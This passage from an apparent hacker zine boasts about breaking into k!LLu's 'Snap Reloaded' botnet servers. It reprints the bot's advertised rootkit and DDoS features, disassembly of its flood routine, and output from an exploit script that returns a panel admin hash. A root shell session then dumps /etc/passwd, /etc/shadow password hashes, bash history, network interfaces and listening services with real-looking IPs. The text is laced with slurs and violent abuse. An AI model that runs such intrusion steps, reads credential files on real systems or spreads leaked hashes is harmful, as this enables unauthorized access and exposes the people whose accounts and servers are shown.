kann 15k Ukash daily nahezu Instant auscashen | 7 | ++---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +# + +WHAT THE FUCK IS THIS GUY TALKING ABOUT?!@# It's driving us insane, +because we thought that hacking Undercover.su would be at least a bit, +a _BIT_, of a challenge. But fucking NO! k!LLu is by far the dumbest +person to be ever slapattacked by us. That's why we were not satisfied +with the simple ownage of Undercover.su and headed over to his other +projects ... + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------====={ k!LLu's Botnet }========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +We could now tell you a story about love and ~ | ||( );, +romance, about people dying and fighting as ( ,;.)-\ / ';, +heroes, about people suffering and crying. But \ ( \ ( +instead, we now shall tell you the story of how || \\ +we raped k!LLu and his little botnet to hell and /_( /_( +back. So here it is: . + / \ + _\ /_ + . . (,'v`.) . . + \) ( ) ,' `. ( ) (/ + \`. / `-' `-' \ ,'/ + : ' _______ ' : + | _,-' ,-. `-._ | + |,' ( )__`-'__( ) `.| + (|,-,'-._ _.-`.-.|) + / /<(o )> <(o )>\ \ + : : | | : : + | | ; : | | ------ k!LLu, thou shall + | | (.-.) | | officially be owned + | | ,' ___ `. | | to fuck. + ; |)/ ,'---'. \(| : + _,-/ |/\( )/\| \-._ + _..--'.-( | `-'''-' | )-.`--.._ + `. ;`._________,': ,' + ,' `/ \'`. + `------.------' + +One thing that has always been connected to k!LLu was the botnet he +kept bragging about. It probably all started back at crimenetwork when +he ddosed competitors to at least get some visitors. Knowing k!LLu, +one would think his botnet was just imaginary like most of the other +things he rambles about. But no, k!LLu actually had a botnet for which +he used his own botsoftware "Snap Reloaded". Unsurprisingly, this +piece of malware is just as bad as most of the other things he has +been working on. If you don't find at least two pre-auth +vulnerabilities within a minute of looking at the panel's source you +must be seriously retarded and it was accordingly easy to break into +his boxes. k!LLu hosts more than one panel most of which are run from +separate VMs and probably belong to some of his customers. In fact +everyone who's hosting their net on k!llu's server is actually +donating bots to k!LLu. He is a master of advertising but +unfortunately, he doesn't take telling the truth too seriously. That's +why we'll take a look into the "Snap Reloaded" bot he is selling. + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] User-Mode (ring3) r00tkit | +| -> [+] run's as a service and hide himself | +| -> [+] hides&protect root process | +| -> [+] hides&protect files | +| -> [+] hides root processes | +| -> [+] hides used local&remote TCP Port(s) <- thx to jeffosz | +| -> [+] hides used local&remote UDP Port(s) <- thx to jeffosz | +| -> [+] hides used regkey''s | +|____________________________________________________________________| + +You don't think k!LLu'd be shameless enough to _invent_ a feature? He +did. Well, at least not a single binary we could get our hands on +showed any signs of a rootkit. A 3-year-old would be able to kill the +process and kick that piece of shit into the trashcan. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] METAMORPHIC architecture | +| -> [+] use random legit process,file & service names | +| -> [+] generate a unique stub every run | +| -> [+] whole software gets metamorph virtualized byte per byte | +|____________________________________________________________________| + +Again, a hardcoded list of processnames, that aren't at all "legit" is +not that cool. And, unsurprisingly, the bot isn't virtualized. But +hey, he used UPX, we give him that. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] webpanel developped with dreamweaver cs5 and own ajax | +| framework using mysql and php | +| -- no ressource wasting jquery/extJS shit like kerber0s, | +| EliteLoader | +| [+] multi theme support | +| [+] multi command support => every victim can do as many threads | +| as you want | +| [+] reliable protocoll which creates the lowest possible server | +| load | +| [+] modularized structure | +| [+] Blocks common Trackers | +| [+] dynamic ConnectionDelay => if server load raises, delay | +| raises and you are able to host over 25000Victims on a little | +| VPS | +|____________________________________________________________________| + +The next thing on the list is the webpanel. It's partially ioncube +encoded but still runs perfectly without even changing anything. As +said above, it's also pretty straight forward to find several vulns in +it. But wait: + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] XSS/SQLi Prevention Firewall | +|____________________________________________________________________| + +And we really gotta say: this thing is the shit. Well, of course it +doesn't exist but who'd bother and check anyways? + +$ ./killu_u_r_lame.pl bgate.secure-host.in + bl1ng bl1ng! + admin:76a2173be6393254e72ffa4d6df1030a +$ + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Another interessting thing is, thats is the WORLDS FIRST BOT | +| which patches tcpip.sys/tcpstack on ALL WIN-OS(including Win8) | +| via DCI and Windows-own Testsigning Mode | +| This allows us again to use half-open connections and rawSockets! | +| and grant us to use things like IP Spoofing or REAL SYNFLOOD ! | +| | +| This is the really awesome part, of this state-of-the-Art Botnet | +| software! DDoS Class is written in pure (m)ASM to get the maximum | +| possible stability and maximum possible Attack-strength/Power. | +| Everyone who says his Bot is stronger, LIES | +| There's NO WAY to get DDoS stronger! | +|____________________________________________________________________| + +Wow, k!LLu talking about people lying, somewhat ironic. Let's have a +look at this badass functions of his. + +[...] +movzx eax, byte ptr [ebp+14] ; | +mov dword ptr [ebp-C], ebx ; | +mov dword ptr [ebp-8], esi ; | +mov esi, dword ptr [ebp+8] ; | +mov byte ptr [ebp-11], al ; | +xor eax, eax ; | +mov dword ptr [ebp-4], edi ; | +mov edi, dword ptr [ebp+C] ; | +movsx ebx, word ptr [ebp+10] ; | +mov dword ptr [esp+8], eax ; | +mov eax, 1 ; | +mov dword ptr [esp+4], eax ; | +mov dword ptr [esp], 2 ; | +call near dword ptr [41E0E8] ; \socket +mov dword ptr [esi+190], eax +sub esp, 0C +inc eax ; | +je 004029E6 ; | +movzx eax, bx ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0E0] ; \ntohs +mov ecx, 2 +mov word ptr [esi+194], cx +sub esp, 4 +mov word ptr [esi+196], ax ; | +mov eax, dword ptr [edi] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0E4] ; \inet_addr +sub esp, 4 +inc eax ; | +je 00402A10 ; | +mov eax, dword ptr [edi] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0E4] ; \inet_addr +sub esp, 4 +mov dword ptr [esi+198], eax +cmp byte ptr [ebp-11], 0 +jnz 00402A02 +mov dword ptr [ebp-10], 1 +lea eax, dword ptr [ebp-10] ; | +mov dword ptr [esp+8], eax ; | +mov eax, 8004667E ; | +mov dword ptr [esp+4], eax ; | +mov eax, dword ptr [esi+190] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0A8] ; \ioctlsocket +mov eax, 10 +sub esp, 0C +mov dword ptr [esp+8], eax ; | +lea eax, dword ptr [esi+194] ; | +mov dword ptr [esp+4], eax ; | +mov eax, dword ptr [esi+190] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0D8] ; \connect +[...] + +This is an excerpt from his "synflood" function. It's obvious that +creating a new sockaddr structure for every time you call connect is +not efficient at all. He also seems to think setting a socket to +non-blocking mode via ioctlsocket would make his simple tcp flood look +like a synflood. But let's look at the code that calls this from +within the ddos thread and quickly reveals that this is compiler +generated rather than "plain assembly". + +push ebp +mov ebp, esp +[...] +mov eax, dword ptr [41E06C] ; ||| +mov eax, dword ptr [eax+14] ; ||| +mov dword ptr [esp], eax ; ||| +call ; ||\atoi +mov dword ptr [ebp-70], eax ; || +mov eax, dword ptr [41E06C] ; || +mov eax, dword ptr [eax+C] ; || +mov dword ptr [esp], eax ; || +call ; |\atoi +mov dword ptr [ebp-74], eax ; | +mov eax, dword ptr [41E06C] ; | +mov eax, dword ptr [eax+8] ; | +mov dword ptr [esp], eax ; | +call ; \atoi +[...] +mov esi, esi ; plain asm in the hewd +[...] +mov dword ptr [esp], 0 ; | +call ; \ExitThread +[...] + +But don't be too sad, k!LLu. We got some exciting news for you: +userspace ddos code is not the bottleneck. You're probably trying to +get your bots back after we rmd your box but we're afraid we were able +to clean a majority of them up. + +# uname -a +Linux link.cyberhost.kz 2.6.18-238.9.1.el5.028stab089.1PAE #1 SMP Thu Apr 14 14:38:02 MSD 2011 i686 athlon i386 GNU/Linux + +# id +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) + +# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +nscd:x:28:28:NSCD Daemon:/:/sbin/nologin +vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin +mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin +smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin +pcap:x:77:77::/var/arpwatch:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +haldaemon:x:68:68:HAL daemon:/:/sbin/nologin +avahi:x:70:70:Avahi daemon:/:/sbin/nologin +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin +rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin +nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +lxlabs:x:500:500::/home/lxlabs:/sbin/nologin +mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash +truevm:x:503:503:System User for 130:/home/truevm:/usr/bin/lxopenvz +stansecuvm:x:504:504:System User for 140:/home/stansecuvm:/usr/bin/lxopenvz +bnetvm:x:506:506:System User for 160:/home/bnetvm:/usr/bin/lxopenvz +scriptstvm:x:508:508:System User for 180:/home/scriptstvm:/usr/bin/lxopenvz +spikevm:x:514:514:System User for 240:/home/spikevm:/usr/bin/lxopenvz +xtothecvm:x:515:515:System User for 250:/home/xtothecvm:/usr/bin/lxopenvz +y00vm:x:516:516:System User for 260:/home/y00vm:/usr/bin/lxopenvz +iodasvm:x:517:517:System User for 270:/home/iodasvm:/usr/bin/lxopenvz +rootvm:x:520:520:System User for 300:/home/rootvm:/usr/bin/lxopenvz +stansocksvm:x:521:521:System User for 310:/home/stansocksvm:/usr/bin/lxopenvz +bdgatevm:x:524:524:System User for 340:/home/bdgatevm:/usr/bin/lxopenvz +fredvm:x:525:525:System User for 350:/home/fredvm:/usr/bin/lxopenvz +spike80vm:x:526:526:System User for 360:/home/spike80vm:/usr/bin/lxopenvz +ixdevm:x:527:527:System User for 370:/home/ixdevm:/usr/bin/lxopenvz +wohovm:x:528:528:System User for 380:/home/wohovm:/usr/bin/lxopenvz +sethvm:x:529:529:System User for 390:/home/sethvm:/usr/bin/lxopenvz + +# cat /etc/shadow +root:$1$v.vPGI.9$s9ss0TBUPqOe9X3ufPT4W1:15105:0:99999:7::: +bin:*:15105:0:99999:7::: +daemon:*:15105:0:99999:7::: +adm:*:15105:0:99999:7::: +lp:*:15105:0:99999:7::: +sync:*:15105:0:99999:7::: +shutdown:*:15105:0:99999:7::: +halt:*:15105:0:99999:7::: +mail:*:15105:0:99999:7::: +news:*:15105:0:99999:7::: +uucp:*:15105:0:99999:7::: +operator:*:15105:0:99999:7::: +games:*:15105:0:99999:7::: +gopher:*:15105:0:99999:7::: +ftp:*:15105:0:99999:7::: +nobody:*:15105:0:99999:7::: +nscd:!!:15105:0:99999:7::: +vcsa:!!:15105:0:99999:7::: +rpc:!!:15105:0:99999:7::: +mailnull:!!:15105:0:99999:7::: +smmsp:!!:15105:0:99999:7::: +pcap:!!:15105:0:99999:7::: +dbus:!!:15105:0:99999:7::: +haldaemon:!!:15105:0:99999:7::: +avahi:!!:15105:0:99999:7::: +sshd:!!:15105:0:99999:7::: +avahi-autoipd:!!:15105:0:99999:7::: +rpcuser:!!:15105:0:99999:7::: +nfsnobody:!!:15105:0:99999:7::: +apache:!!:15106:::::: +lxlabs:!!:15106:0:99999:7::: +mysql:!!:15106:::::: +truevm:$1$Cp/eTTFF$nqVR5/rgSvqs51UIuz6Et.:15251:0:99999:7::: +stansecuvm:$1$o3WpZh6S$mPXWzQjMEL5zIkwBFhGGD1:15112:0:99999:7::: +bnetvm:$1$V.AhGgm3$o4ZdgfznQ3sE2.1KJa0qx/:15115:0:99999:7::: +scriptstvm:$1$W5AWFCAH$dbJijEizlB92aFTY7HCDX.:15116:0:99999:7::: +spikevm:$1$m1v5zxhw$xs3WszkyroI/FWi8djdo4.:15132:0:99999:7::: +xtothecvm:$1$D9ZLxI1c$Sopa3HPCOBTRC4c6KBtCD/:15134:0:99999:7::: +y00vm:$1$k1GqAtHB$mdsd292s..nL/v6YG5Tfz0:15138:0:99999:7::: +iodasvm:$1$6laui1W/$L/evF8MACUrrJ.AUbBC2E.:15138:0:99999:7::: +rootvm:$1$0rDTGCQP$1OK0z1ldsptZuWD9YJmfM.:15201:0:99999:7::: +stansocksvm:$1$KbcEDmUM$Idr7lpMI/JOYU0pY3uafF/:15201:0:99999:7::: +bdgatevm:$1$0TIPnn9P$.IoVhoG0DYMW0gUfzUqnH/:15208:0:99999:7::: +fredvm:$1$QKXpFmyk$tNA8I7G6ZCc5eKbuHyHTr/:15222:0:99999:7::: +spike80vm:$1$Ir2OIga1$Xfp.9xdaXFWaaxc18Q/hR/:15224:0:99999:7::: +ixdevm:$1$xK6jSstU$cOuss77pdmE6YfUmBL2pa1:15226:0:99999:7::: +wohovm:$1$SRfLhbuK$gz/o3IYB/WJdHKGPhll6z0:15233:0:99999:7::: +sethvm:$1$aal3q4fB$bf2DeWIqbsZ/IVjBGhepv0:15250:0:99999:7::: + +# pwd +/root + +# alias ls="ls -la" + +# ls +total 341288 +drwxr-x--- 4 root root 4096 Oct 9 08:20 . +drwxr-xr-x 25 root root 4096 Oct 10 05:48 .. +-rw------- 1 root root 6069 Oct 9 08:37 .bash_history +-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout +-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile +-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc +-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc +drwxr-xr-x 16 root root 4096 May 10 2009 .etc +-rw------- 1 root root 41 Oct 9 07:59 .lesshst +-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc +-rw-r--r-- 1 root root 134392688 May 12 02:28 1000mb.bin +-rw-r--r-- 1 root root 135565568 May 12 05:16 1000mb.bin.1 +-rw-r--r-- 1 root root 30797000 May 12 02:23 100mb.test +-rw-r--r-- 1 root root 48135408 May 12 02:55 100mb.test.1 +-rw------- 1 root root 1171 May 11 09:46 anaconda-ks.cfg +-rw-r--r-- 1 root root 719 May 12 01:03 hypervm-install-master.sh +-rw-r--r-- 1 root root 14502 May 11 09:46 install.log +-rw-r--r-- 1 root root 2886 May 11 09:46 install.log.syslog +drwxr-xr-x 7 root root 4096 May 12 01:04 program-install +-rw-r--r-- 1 root root 68091 Jun 4 2009 program-install.zip + +# cat .bash_history +yum install openssh-server net-snmp +nano /etc/snmp/snmpd.conf +/etc/init.d/snmpd restart +exit +top +setenforce 0 +wget http://download.lxcenter.org/download/hypervm/production/hypervm-install-master.sh +sh ./hypervm-install-master.sh --virtualization-type=xen/openvz/NON +sh ./hypervm-install-master.sh --virtualization-type=openvz +nano /etc/grub.conf +shutdown -r now +wget http://mirror.leaseweb.com/speedtest/1000mb.bin +top +service hypervm +service hypervm start +yum install iptraf +iptraf +nano /etc/resolv.conf +nano /etc/resolv.conf +ifconfig +tracert +tracert 193.107.16.183 +193.107.16.82 +tracert 193.107.16.183 +wget http://cachefly.cachefly.net/100mb.test +wget http://cachefly.cacwget http://cachefly.cachefly.net/100mb.testhefly.net/100mb.test +get http://cachefly.cachefly.net/1000mb.test +wget http://cachefly.cachefly.net/1000mb.test +wget http://cachefly.cachefly.net/100mb.test +wget http://mirror.leaseweb.com/speedtest/1000mb.bin +lsmod |grep -i ipt_conntrack +/sbin/modprobe ipt_owner +/sbin/modprobe ipt_recent +/sbin/modprobe ipt_tos +/sbin/modprobe ipt_TOS +/sbin/modprobe ipt_LOG +/sbin/modprobe ip_conntrack +/sbin/modprobe ipt_limit +/sbin/modprobe ipt_multiport +/sbin/modprobe iptable_filter +/sbin/modprobe iptable_mangle +/sbin/modprobe iptable_TCPMSS +/sbin/modprobe iptable_tcpmss +/sbin/modprobe ipt_tcpmss +/sbin/modprobe ipt_ttl +/sbin/modprobe ipt_length +/sbin/modprobe ipt_state +/sbin/modprobe ipt_nat +/sbin/modprobe ip_nat_ftp +nano /etc/sysconfig/iptables-config +nano /etc/sysconfig/vz +service iptables restart +service vz start +service vz stop +service iptables restart +service vz start +iptables -A INPUT -p tcp --dport 80 -j DROP +iptables -A INPUT -p tcp --dport 3306 -j DROP +ping www.besthotshop.info +ping www.ddstores.com +modprobe ipt_limit +nano /etc/sysconfig/iptables-config +nano /etc/sysconfig/vz +iptables restart +/etc/init.d/iptables restart +vzctl set 110 --iptables "ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save + + + + +save +-- save +vzctl set 110 --iptables iptable_nat --save +vzctl stop 110 +vzctl set 110 --iptables iptable_nat --save +vzctl set 110 --iptables iptable_nat ipt_limit --save +vzctl set 110 --iptables ipt_limit --save +vzctl restart 110 +vzctl stop 110 +nano /etc/sysconfig/vz +service vz restart +vzctl set 110 --numiptent 2000 --save +vzctl stop 110 +vzctl set 110 --iptables +vzctl set 110 --iptables ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save +vzctl set 110 --iptables +vzctl set 110 --iptables -h +vzctl set 110 -h +vzctl set 110 --help +modprobe ipt_limit + +ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_l +iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j DROP +iptables --flush +service vz restart +iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 8 -j DROP +sdasdasdasd +modprobe ipt_connlimit +nano /etc/sysconfig/vz +nano /etc/sysconfig/iptables-config +/etc/init.d/iptables restart +service vz restart +shutdown -r now +service vz restart +lsmod | grep ipt +modprobe -v xt_connlimit +echo 2262144 > /proc/sys/net/ipv4/ip_conntrack_max +echo 22262144 > /proc/sys/net/ipv4/ip_conntrack_max +dmeg +dmesg +iptables --flush +service iptables restart +iptraf +modprobe xt_state +sysctl net.ipv4.netfilter.ip_conntrack_max +wc -l /proc/net/ip_conntrack +sysctl - +sysctl -po +sysctl -p +nano /etc/sysctl.conf +sysctl -p +nano /etc/sysctl.conf +sysctl -p +sysctl -p | grep mem +sysctl -p | grep mem +yum install htop +system-config-network +ifconfig +ping 193.107.17.66 +ping 193.107.17.67 +iptables --flush +ping 193.107.17.80 +sysctl -p | grep mem +ping 193.107.17.66 +ping 193.107.17.80 +nano /etc/sysctl.conf +service network restart +ip route +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 +service network restart +service network restart +ip route +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 +ip route +ip route add 193.107.17.80 dev venet0 scope link +ip route add 193.107.17.66 dev venet0 scope link +nano /etc/sysctl.conf +service sysctl restart +sysctl -p +sysctl -a +ip route +ip route add 193.107.17.66 dev eth0 scope link +ip route add 193.107.17.67 dev eth0 scope link +ip rute +ip route +service network restart +ifup-local +ip route +ip route add 193.107.17.0/24 dev eth0 +route add 193.107.17.0/24 netmask 255.255.255.0 dev eth1 + +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.1 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 +route +redhat-config-network +network-admin +route add default2 gw 193.107.17.1 eth0 +route add default gw 193.107.17.1 eth0 +route +service httpd stop +route add default gw 193.107.17.1 eth0 +route add default2 gw 193.107.17.1 eth0 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68 +ip route add 193.107.17.0/24 dev eth0 +ifconfig +route add default gw 193.107.17.1 eth0 +ip route add 193.107.17.0/24 dev eth0 +service network restart +ip route add 193.107.17.0/24 dev eth0 +route add default gw 193.107.17.1 eth0 + +ip route add 193.107.17.0/24 dev venet0 +netstat +paswd +passwd +modprobe tun +vzctl set 310 --devices c:10:200:rw --save +vzctl set 310 --capability net_admin:on --save +modprobe ipt_mark +modprobe ipt_MARK +modprobe tun +vzctl stop 310 +vzctl set 310 --capability net_admin:on --save +vzctl set 310 --devices c:10:200:rw --save +vzctl start 310 +vzctl exec 310 mkdir -p /dev/net +vzctl exec 310 mknod /dev/net/tun c 10 200 +vzctl exec 310 chmod 600 /dev/net/tun +df +top +su bnetvm +iptables -A INPUT -p tcp --destination-port 80 -j DROP +top +hitop +htop +ftop +iftop +netstat + +# ifconfig +eth0 Link encap:Ethernet HWaddr E0:CB:4E:4F:A7:D8 + inet addr:193.107.16.82 Bcast:193.107.16.255 Mask:255.255.255.0 + inet6 addr: fe80::e2cb:4eff:fe4f:a7d8/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:3764684 errors:0 dropped:0 overruns:0 frame:0 + TX packets:2963185 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:517778892 (493.7 MiB) TX bytes:429952789 (410.0 MiB) + Interrupt:90 Base address:0x2000 + +lo Link encap:Local Loopback + inet addr:127.0.0.1 Mask:255.0.0.0 + inet6 addr: ::1/128 Scope:Host + UP LOOPBACK RUNNING MTU:16436 Metric:1 + RX packets:3830 errors:0 dropped:0 overruns:0 frame:0 + TX packets:3830 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:257453 (251.4 KiB) TX bytes:257453 (251.4 KiB) + +venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 + UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 + RX packets:2952095 errors:0 dropped:0 overruns:0 frame:0 + TX packets:3188473 errors:0 dropped:313 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:387733783 (369.7 MiB) TX bytes:408435813 (389.5 MiB) + + +# netstat -tulpn +Active Internet connections (only servers) +Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name +tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 9044/tcpserver +tcp 0 0 0.0.0.0:7778 0.0.0.0:* LISTEN 338/kloxo.httpd +tcp 0 0 127.0.0.1:7776 0.0.0.0:* LISTEN 22868/php +tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 9051/tcpserver +tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 8760/tcpserver +tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN 6813/tcpserver +tcp 0 0 0.0.0.0:7779 0.0.0.0:* LISTEN 744/php +tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN 31415/sendmail: MTA +tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 28959/xinetd +tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 27340/named +tcp 0 0 193.107.16.217:53 0.0.0.0:* LISTEN 21090/named +tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 21090/named +tcp 0 0 0.0.0.0:7777 0.0.0.0:* LISTEN 20789/kloxo.httpd +tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 12611/xinetd +tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 21054/sshd +tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 18864/mysqld +tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2855/apache2 +tcp 0 0 193.107.17.80:53 0.0.0.0:* LISTEN 14937/named +tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2255/mysqld +tcp 0 0 193.107.17.81:53 0.0.0.0:* LISTEN 29195/named +tcp 0 0 193.107.16.197:443 0.0.0.0:* LISTEN 19137/lighttpd +tcp 0 0 0.0.0.0:55986 0.0.0.0:* LISTEN 350/perl +tcp 0 0 0.0.0.0:65500 0.0.0.0:* LISTEN 22852/perl +tcp 0 0 0.0.0.0:5544 0.0.0.0:* LISTEN 6594/sshd +tcp 0 0 193.107.17.69:53 0.0.0.0:* LISTEN 24903/named +tcp 0 0 193.107.16.184:53 0.0.0.0:* LISTEN 16961/named +tcp 0 0 193.107.16.183:53 0.0.0.0:* LISTEN 24588/named +tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 25293/sendmail: MTA +tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 6276/portmap +tcp 0 0 193.107.16.196:53 0.0.0.0:* LISTEN 30862/named +tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 15210/smbd +tcp 0 0 193.107.17.67:53 0.0.0.0:* LISTEN 25565/named +tcp 0 0 193.107.16.81:53 0.0.0.0:* LISTEN 12513/named +tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 21079/php-fpm.conf) +tcp 0 0 127.0.0.1:8886 0.0.0.0:* LISTEN 8978/php +tcp 0 0 193.107.16.55:53 0.0.0.0:* LISTEN 8944/named +tcp 0 0 0.0.0.0:8887 0.0.0.0:* LISTEN 7026/hypervm.httpd +tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 6608/cupsd +tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 7026/hypervm.httpd +tcp 0 0 193.107.17.83:53 0.0.0.0:* LISTEN 18447/named +tcp 0 0 0.0.0.0:8889 0.0.0.0:* LISTEN 8978/php +tcp 0 0 0.0.0.0:985 0.0.0.0:* LISTEN 6315/rpc.statd +tcp 0 0 193.107.17.68:53 0.0.0.0:* LISTEN 27340/named +tcp 0 0 193.107.16.55:443 0.0.0.0:* LISTEN 16889/lighttpd +tcp 0 0 127.0.0.1:2000 0.0.0.0:* LISTEN 25205/varnishd +tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 20954/nginx +tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 15210/smbd +tcp 0 0 :::80 :::* LISTEN 28969/httpd +tcp 0 0 :::21 :::* LISTEN 31096/proftpd: (acc +tcp 0 0 ::1:953 :::* LISTEN 27340/named +tcp 0 0 :::22 :::* LISTEN 21198/sshd +tcp 0 0 :::443 :::* LISTEN 2460/httpd +tcp 0 0 :::5544 :::* LISTEN 6594/sshd +tcp 0 0 :::53 :::* LISTEN 16961/named +udp 0 0 0.0.0.0:111 0.0.0.0:* 6276/portmap +udp 0 0 193.107.16.55:53 0.0.0.0:* 8944/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 8944/named +udp 0 0 193.107.16.197:53 0.0.0.0:* 15203/tinydns +udp 0 0 193.107.16.81:53 0.0.0.0:* 12513/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 12513/named +udp 0 0 193.107.16.184:53 0.0.0.0:* 16961/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 16961/named +udp 0 0 193.107.17.80:53 0.0.0.0:* 14937/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 14937/named +udp 0 0 193.107.17.83:53 0.0.0.0:* 18447/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 18447/named +udp 0 0 193.107.16.184:137 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.184:137 0.0.0.0:* 14895/nmbd +udp 0 0 0.0.0.0:137 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd +udp 